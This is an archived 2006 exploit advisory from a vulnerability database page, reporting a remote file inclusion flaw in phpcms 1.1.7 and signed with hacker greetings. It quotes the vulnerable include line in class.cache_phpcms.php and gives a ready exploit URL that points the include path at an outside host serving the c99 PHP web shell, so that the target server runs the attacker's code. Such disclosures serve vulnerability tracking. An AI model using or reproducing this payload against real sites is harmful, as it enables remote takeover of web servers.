Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15506
HistoryDec 26, 2006 - 12:00 a.m.

phpcms <=- 1.1.7 Remote File Inclusion

2006-12-2600:00:00
vulners.com
18

#phpcms <=- 1.1.7 Remote File Inclusion
#Download Source : #http://phpcms.de/files/phpcms_1_1_7.zip
#Found By : b0rizQ
#Greetz : Nuck3r + Crack_Man + Red_Casper + RaChidox + Broken-Proxy + S4mi


File : class.cache_phpcms.php
–Bugs--------------------------------------
include ($PHPCMS_INCLUDEPATH.'/language.'.$DEFAULTS->LANGUAGE );
if ( $DEFAULTS->STATS == 'on' )


Exmple And Methode Exploit :

http://www.traget.***/cms/include/class.cache_phpcms.php?PHPCMS_INCLUDEPATH=http://b0rizq.by.ru/c99.txt?

""""""""""www.b0rizQ.Biz"""""""""""""""""""""